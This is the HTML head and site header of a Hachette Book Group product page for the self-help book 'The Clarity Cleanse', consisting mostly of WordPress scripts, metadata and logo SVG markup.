<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>The Clarity Cleanse by Dr. Habib Sadeghi | Hachette Book Group</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.hachettebookgroup.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.hachettebookgroup.com/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.hachettebookgroup.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.hachettebookgroup.com/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.hachettebookgroup.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.hachettebookgroup.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=7bde73b1ced750991c18' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.hachettebookgroup.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=8b854795662651bd9e81' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.hachettebookgroup.com/wp-content/mu-plugins/jetpack-10.8/css/jetpack.css?ver=10.8' type='text/css' media='all' />
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/brunhilde.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.hachettebookgroup.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.hachettebookgroup.com/wp-json/wp/v2/hbg-title/679198" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.hachettebookgroup.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.hachettebookgroup.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.3" />
<link rel="canonical" href="https://www.grandcentralpublishing.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781455542222/" />
<link rel='shortlink' href='https://www.hachettebookgroup.com/?p=679198' />
<link rel="alternate" type="application/json+oembed" href="https://www.hachettebookgroup.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.hachettebookgroup.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"grand-central-publishing","genre":"Body, Mind &amp; Spirit","genreSecondary":"Inspiration &amp; Personal Growth","genreTertiary":"","format":"Trade Paperback"}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="book" />
<meta property="og:title" content="The Clarity Cleanse" />
<meta property="og:url" content="https://www.hachettebookgroup.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781455542222/" />
<meta property="og:description" content="A liberating 12-step guide to recognizing the emotional issues that hold us back, with strategies to increase our energy and help us reach our potential by t..." />
<meta property="article:published_time" content="2019-04-09T07:04:05+00:00" />
<meta property="article:modified_time" content="2022-04-26T07:05:37+00:00" />
<meta property="og:site_name" content="Hachette Book Group" />
<meta property="og:image" content="https://www.hachettebookgroup.com/wp-content/uploads/2019/12/9781455542222.jpg?fit=500%2C750" />
<meta property="og:image:width" content="500" />
<meta property="og:image:height" content="750" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta property="og:book.author" content="Dr. Habib Sadeghi, Gwyneth Paltrow" />
<meta property="og:book.isbn" content="9781455542222" />
<meta property="og:book.release_date" content="December 31, 2019" />
<meta property="og:price:currency" content="USD" />
<meta property="og:price:amount" content="16.99" />
<meta property="og:canadian_price:currency" content="CAD" />
<meta property="og:canadian_price:amount" content="22.99" />
<meta name="twitter:text:title" content="The Clarity Cleanse" />
<meta name="twitter:text:isbn" content="9781455542222" />
<meta name="twitter:text:cta" content="Read More" />
<meta name="twitter:text:description" content="A liberating 12-step guide to recognizing the emotional issues that hold us back, with strategies to increase our energy and help us reach our potential by t..." />
<meta name="twitter:image" content="https://www.hachettebookgroup.com/wp-content/uploads/2019/12/9781455542222.jpg?fit=500%2C750&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="hbg-title-template-default single single-hbg-title postid-679198">
				<div id="page" class="site single-post page">
			
<header id="site-header" class="site-header">
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
				<div class="site-header__desktop-logo">
			<a href="https://www.hachettebookgroup.com/">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 286.14 75.3" role="img" aria-labelledby="title-hachette-logo-ini-3932103917  desc-hachette-logo-ini-1978472142">
	<title id="title-hachette-logo-ini-3932103917">Hachette Logo Large</title>
	<desc id="desc-hachette-logo-ini-1978472142">Light blue Hachette logo with icon and text</desc>
	<style>.hbg-1{fill:#3c97ba}</style>
	<polygon role="presentation" class="hbg-1" points="59.72 75.02 59.72 15.3 36.93 15.3 36.93 19.62 55.4 19.62 55.4 70.69 41.26 70.69 41.26 52.23 18.46 52.23 18.46 56.55 36.93 56.55 36.93 75.02 59.72 75.02"/>
	<polygon role="presentation" class="hbg-1" points="22.79 33.76 41.26 33.76 41.26 38.09 18.47 38.09 18.47 19.62 4.33 19.62 4.33 70.69 22.79 70.69 22.79 75.02 0 75.02 0 15.29 22.79 15.29 22.79 33.76"/>
	<path role="presentation" class="hbg-1" d="M80.79,74.83c-1.14,0-2.28,0-3.42,0-.54,0-.73-.18-.73-.73q0-7.62,0-15.24c0-.53.2-.68.7-.68,2.13,0,4.26,0,6.39,0A4.28,4.28,0,0,1,88,63.66a3.5,3.5,0,0,1-1.44,2.18c-.44.32-.51.53,0,.85,1.81,1.14,2.09,3,1.59,5.07a4.07,4.07,0,0,1-4,3c-1.14,0-2.28,0-3.42,0ZM79.06,70c0,.64,0,1.29,0,1.93s.2.8.72.8c1.28,0,2.58,0,3.85-.08A2.45,2.45,0,0,0,86,70.15a2.42,2.42,0,0,0-2.18-2.64,30.93,30.93,0,0,0-4.21-.11c-.19,0-.51.38-.53.62A18.89,18.89,0,0,0,79.06,70Zm2.63-9.68c-.64,0-1.29,0-1.93,0s-.71.18-.7.7q0,1.78,0,3.57c0,.57.28.74.77.74,1,0,2,0,3,0A4.78,4.78,0,0,0,84.32,65a2.37,2.37,0,0,0,1.39-2.75,2.33,2.33,0,0,0-2.23-1.93C82.88,60.33,82.29,60.34,81.69,60.34Z"/>
	<path role="presentation" class="hbg-1" d="M171.55,74.81c-.94,0-1.73,0-2.5,0-.2,0-.44-.3-.55-.52-1-1.89-1.92-3.79-2.84-5.71a1.14,1.14,0,0,0-1.25-.79,10.38,10.38,0,0,1-1.63,0c-.61,0-.84.18-.82.81,0,1.81,0,3.62,0,5.43,0,.61-.19.85-.81.83-1.93,0-1.6.17-1.61-1.55,0-4.71,0-9.42,0-14.13,0-1,0-1,1-1,1.88,0,3.77,0,5.65,0a4.57,4.57,0,0,1,4.91,4.27A4.42,4.42,0,0,1,168.73,67c-1,.48-1,.49-.46,1.46ZM161.95,63c0,.69,0,1.39,0,2.08,0,.45.2.66.61.65,1.36,0,2.73,0,4.07-.12a2.59,2.59,0,0,0,2.12-2.8,2.62,2.62,0,0,0-2.48-2.49c-1.24,0-2.47,0-3.71,0-.44,0-.63.16-.62.61C162,61.64,161.95,62.33,161.95,63Z"/>
	<path role="presentation" class="hbg-1" d="M135.8,74.8c-.94,0-1.74,0-2.54,0-.19,0-.41-.33-.54-.55-1.31-2.27-2.61-4.56-3.9-6.84-.46-.81-.59-.83-1.19-.1a1.2,1.2,0,0,1-.14.17,6.47,6.47,0,0,0-2.17,6.17c.13,1.19,0,1.21-1.21,1.2-.17,0-.35,0-.52,0-.47,0-.66-.19-.66-.67q0-7.66,0-15.33c0-.43.15-.64.6-.64,2.21,0,1.78-.19,1.8,1.66s0,3.72,0,5.58v1a5.36,5.36,0,0,0,.74-.59q2.89-3.54,5.75-7.1a1.32,1.32,0,0,1,1.19-.59c.66,0,1.33,0,2.17,0-.38.48-.65.84-.93,1.19-1.28,1.55-2.55,3.1-3.85,4.63a1,1,0,0,0-.12,1.37c1.69,2.8,3.32,5.63,5,8.45C135.43,74.11,135.57,74.39,135.8,74.8Z"/>
	<path role="presentation" class="hbg-1" d="M155.47,63a17.1,17.1,0,0,1-2,0c-.21,0-.44-.37-.54-.62a3.57,3.57,0,0,0-5.43-1.61,3.08,3.08,0,0,0-1.4,2.43,53.36,53.36,0,0,0,0,6.6,3.23,3.23,0,0,0,3.54,3.09,3.5,3.5,0,0,0,3.52-3.42c.05-1.83.09-1.53-1.46-1.55-.47,0-.94,0-1.41,0s-.73-.2-.7-.71a2.41,2.41,0,0,1,0-.74c.09-.22.34-.51.52-.52,1.64,0,3.27,0,4.91,0,.17,0,.49.24.49.37,0,1.68.25,3.39-.37,5a5.33,5.33,0,0,1-4.28,3.5,6,6,0,0,1-6.24-2.2,5,5,0,0,1-1-3c-.05-2,0-3.92,0-5.88A5.54,5.54,0,0,1,149.23,58a5.76,5.76,0,0,1,6.16,4.4A4.79,4.79,0,0,1,155.47,63Z"/>
	<path role="presentation" class="hbg-1" d="M174.34,66.49a29,29,0,0,1,.35-4.21,6,6,0,0,1,11.42,0,12,12,0,0,1,.24,2.73c0,1.76-.06,3.52-.15,5.27-.11,2.1-1.94,4-4.37,4.56-2.74.66-5.75-.58-6.77-3a13.59,13.59,0,0,1-.63-3.47,14.43,14.43,0,0,1,0-1.86Zm2.43,0c.07,1.17.07,2.34.22,3.49a3.34,3.34,0,0,0,3.4,2.93,3.43,3.43,0,0,0,3.43-3.08,27.88,27.88,0,0,0,0-6.73,3.46,3.46,0,0,0-3.34-3A3.42,3.42,0,0,0,177,63C176.85,64.13,176.84,65.32,176.77,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M118.85,66.55c0,1.21.06,2.43,0,3.64a5.4,5.4,0,0,1-4.42,4.68,6,6,0,0,1-6.31-2.33,5.45,5.45,0,0,1-.84-2.18,28.23,28.23,0,0,1,0-7.62,5.92,5.92,0,0,1,11.72,1.14c0,.89,0,1.79,0,2.68Zm-9.48-.05c.07,1,.13,2,.2,3a3.47,3.47,0,0,0,6.93,0c.13-2,.08-4.06,0-6.08A3.4,3.4,0,0,0,113,60.11a3.34,3.34,0,0,0-3.45,3.05C109.46,64.27,109.44,65.38,109.37,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M103.59,66.51a32.21,32.21,0,0,1,0,3.64,5.34,5.34,0,0,1-4.41,4.7A5.94,5.94,0,0,1,92.48,72a5.08,5.08,0,0,1-.6-2.11c-.05-2.35,0-4.7.05-7.05C92,60.33,94.57,58,97.68,58a5.65,5.65,0,0,1,6,5.82c0,.89,0,1.78,0,2.68Zm-2.23,0c-.05-1-.11-2-.15-3a3.49,3.49,0,0,0-3.46-3.39,3.43,3.43,0,0,0-3.48,3.28c-.07,2.08-.11,4.16,0,6.23a3.3,3.3,0,0,0,3.43,3.31,3.43,3.43,0,0,0,3.48-3.12C101.27,68.71,101.3,67.62,101.36,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M192.47,64.26c0,1.73,0,3.47,0,5.2a3.55,3.55,0,0,0,6.81,1.33,7.29,7.29,0,0,0,.39-2.4c0-3.1,0-6.2,0-9.29,0-.71.21-1,.93-.92,1.58.06,1.39-.15,1.4,1.4,0,3.22,0,6.44,0,9.66a5.35,5.35,0,0,1-3.56,5.31c-2.72,1-6.29.37-7.7-2.59a7.6,7.6,0,0,1-.65-3c-.08-3.32,0-6.64,0-10,0-.61.19-.84.81-.82,1.9.06,1.6-.25,1.62,1.61C192.48,61.29,192.47,62.78,192.47,64.26Z"/>
	<path role="presentation" class="hbg-1" d="M206.38,66.45c0-2.48,0-5,0-7.44,0-.6.16-.84.79-.82,2,0,4.07,0,6.1,0a4.74,4.74,0,0,1,4.46,3.43c.6,2.38-.12,4.66-2,5.72a8.6,8.6,0,0,1-3,.83,23.35,23.35,0,0,1-3,0c-.9,0-1,.09-1,1,0,1.61,0,3.22,0,4.84,0,.57-.17.79-.76.79-1.88,0-1.54.09-1.56-1.54C206.37,71,206.38,68.74,206.38,66.45Zm2.32-3.28c0,.72,0,1.44,0,2.15,0,.43.15.75.62.75,1.38,0,2.77,0,4.14-.14a2.69,2.69,0,0,0,2.1-2.92,2.74,2.74,0,0,0-2.51-2.66c-1.21,0-2.43,0-3.64,0-.57,0-.74.25-.72.77C208.71,61.79,208.7,62.48,208.7,63.18Z"/>
	<path role="presentation" class="hbg-1" d="M97.72,47.56v-20c0-5.92-3.09-9-8.33-9s-8.5,3.23-8.5,9v20h-4.2V.28h4.2V18.84a11.8,11.8,0,0,1,9.25-4.09c7.35,0,11.79,4.69,11.79,12V47.56h-4.2"/>
	<path role="presentation" class="hbg-1" d="M128.46,25.88c0-4.9-2.43-7.46-8.63-7.46-4.32,0-6.52,1.06-8.48,3.86l-2.94-2.62c2.83-3.77,6.2-4.9,11.48-4.9,8.63,0,12.77,3.82,12.77,10.75V47.55h-4.17V44.4c-2.66,2.66-5.13,3.55-9.57,3.55-4.59,0-7.27-.85-9.33-3a9.48,9.48,0,0,1-2.4-6.5c0-5.81,4.12-9.37,11.26-9.37h5.78v3.31H119c-5.14,0-7.65,2.09-7.65,6s2.43,5.86,7.84,5.86c2.84,0,5.42-.25,7.56-2.33,1.15-1.09,1.71-3,1.71-5.84V25.88"/><path class="hbg-1" d="M153.22,48c-8.43,0-14.3-5.86-14.3-16.61s5.87-16.59,14.3-16.59c4.45,0,7.3,1.18,10.68,4.86L161,22.32c-2.58-2.88-4.59-3.84-7.8-3.84a9.33,9.33,0,0,0-8,3.94c-1.56,2.21-2.15,4.7-2.15,8.92s.58,6.73,2.15,8.94a9.33,9.33,0,0,0,8,3.95c3.21,0,5.22-1,7.8-3.84l2.88,2.69c-3.39,3.69-6.24,4.88-10.68,4.88"/>
	<path role="presentation" class="hbg-1" d="M188.77,47.56v-20c0-5.92-3.09-9-8.33-9s-8.5,3.23-8.5,9v20h-4.2V.28h4.2V18.84a11.79,11.79,0,0,1,9.25-4.09c7.35,0,11.79,4.69,11.79,12V47.56h-4.21"/>
	<path role="presentation" class="hbg-1" d="M207.24,29.12v3.31h17.92V30.5c0-9.71-4.94-15.75-13.17-15.75s-13.17,6.16-13.17,16.59c0,11.2,5.25,16.61,14,16.61,5.45,0,8.51-1.69,11.81-5l-3-2.49c-2.64,2.64-4.89,3.75-8.67,3.75-5.15,0-8.25-2.64-9.44-7.4a21.35,21.35,0,0,1-.56-5.49c0-3.77.16-5.71,1.1-7.84a8.67,8.67,0,0,1,15.8,0A13.66,13.66,0,0,1,221,29.12H207.24"/>
	<path role="presentation" class="hbg-1" d="M239.33,47.56c-5.35,0-8.07-3.76-8.07-8.61V18.46H227V15.29h4.25V5.07h4.21V15.29h6.09v3.16h-6.09V38.91c0,3.11,1.45,5,4.62,5h2.21v3.67h-3"/>
	<path role="presentation" class="hbg-1" d="M255.9,47.56c-5.35,0-8.07-3.76-8.07-8.61V18.46h-4.25V15.29h4.25V5.07H252V15.29h6.09v3.16H252V38.91c0,3.11,1.44,5,4.62,5h2.2v3.67h-3"/>
	<path role="presentation" class="hbg-1" d="M268.22,29.12v3.31h17.92V30.5c0-9.71-4.94-15.75-13.17-15.75S259.8,20.91,259.8,31.34c0,11.2,5.25,16.61,14,16.61,5.46,0,8.51-1.69,11.81-5l-3-2.49c-2.64,2.64-4.88,3.75-8.67,3.75-5.15,0-8.25-2.64-9.44-7.4a21.33,21.33,0,0,1-.56-5.49c0-3.77.16-5.71,1.1-7.84a8.67,8.67,0,0,1,15.8,0A13.77,13.77,0,0,1,282,29.12H268.22">
			</a>
		</div>
		<div class="site-header__mobile-logo">
			<a href="https://www.hachettebookgroup.com/">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-2604458116  desc-hachette-logo-4140583602">
	<title id="title-hachette-logo-2604458116">Hachette Logo</title>
	<desc id="desc-hachette-logo-4140583602">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</a>
		</div>
			</h2>

	<ul class="site-header__social">
					<li class="site-header__social-header">
				Follow Us			</li>
							<li class="site-header__social-list-item">
					<a href="https://www.facebook.com/HachetteUS/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-1896046813  desc-facebook-icon-3064191210">
	<title id="title-facebook-icon-1896046813">Facebook Icon</title>
	<desc id="desc-facebook-icon-3064191210">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://twitter.com/HachetteUS" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-3986581922  desc-twitter-icon-397049736">
	<title id="title-twitter-icon-3986581922">Twitter Icon</title>
	<desc id="desc-twitter-icon-397049736">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://www.instagram.com/hachetteus/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-1637687938  desc-ig-icon-2369118966">
	<title id="title-ig-icon-1637687938">Instagram Icon</title>
	<desc id="desc-ig-icon-2369118966">Instagram Icon</desc>
	<rect role="presentation" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
									<li class="site-header__social-list-item">
				<a href="https://www.youtube.com/user/HachetteBookGroup/featured" target="_blank"
					data-type="link-event" data-category="Social Share" data-action="Header" data-label="YouTube"
				>
					
<svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49 48.9" role="img" aria-labelledby="title-search-icon-1984257654  desc-search-icon-4291901480"><defs>
<style>.youtube-youtube-cls-1{fill:#fff;}</style></defs>
<title id="title-search-icon-1984257654">Youtube Icon</title>
<desc id="desc-search-icon-4291901480">YouTube Logo</desc>
<polygon role="presentation" class="youtube-cls-1" points="21.9 20.45 21.9 27.75 28.7 24.15 25 22.15 21.9 20.45"/>
<path role="presentation" class="youtube-cls-1" d="M25,.55A24.45,24.45,0,1,0,49.5,25,24.45,24.45,0,0,0,25,.55ZM37.5,26a29.54,29.54,0,0,1-.2,4.2,6.4,6.4,0,0,1-1,2.6,3.58,3.58,0,0,1-2.5,1.1c-3.5.3-8.7.3-8.7.3s-6.5-.1-8.5-.3a3.93,3.93,0,0,1-2.8-1.1,6.4,6.4,0,0,1-1-2.6,29.66,29.66,0,0,1-.3-4.2V24c.1-1.4.1-2.8.3-4.2a6.4,6.4,0,0,1,1-2.6,3.25,3.25,0,0,1,2.5-1.1c3.5-.3,8.7-.3,8.7-.3s5.2,0,8.7.3a3.41,3.41,0,0,1,2.5,1.1,6.4,6.4,0,0,1,1,2.6,20.49,20.49,0,0,1,.3,4.2Z" transform="translate(-0.5 -0.55)"/></svg>
				</a>
			</li>
										<li class="site-header__social-list-item">
					<a href="https://www.hachettebookgroup.com/newsletters/"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Email"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-email-icon-111496033  desc-email-icon-1810189705">
	<title id="title-email-icon-111496033">Email Icon</title>
	<desc id="desc-email-icon-1810189705">Envelope</desc>
	<path role="presentation" class="cls-1" d="M8.38,12.53a.64.64,0,0,0,0,.09V26.1l6.29-7.48Z" transform="translate(0 0)"/>
	<polygon role="presentation" class="cls-1" points="29.58 11.97 9.17 11.97 19.37 19.94 29.58 11.97"/>
	<polygon role="presentation" class="cls-1" points="19.37 23.18 16.46 20.36 9.07 26.83 29.68 26.83 22.29 20.36 19.37 23.18"/>
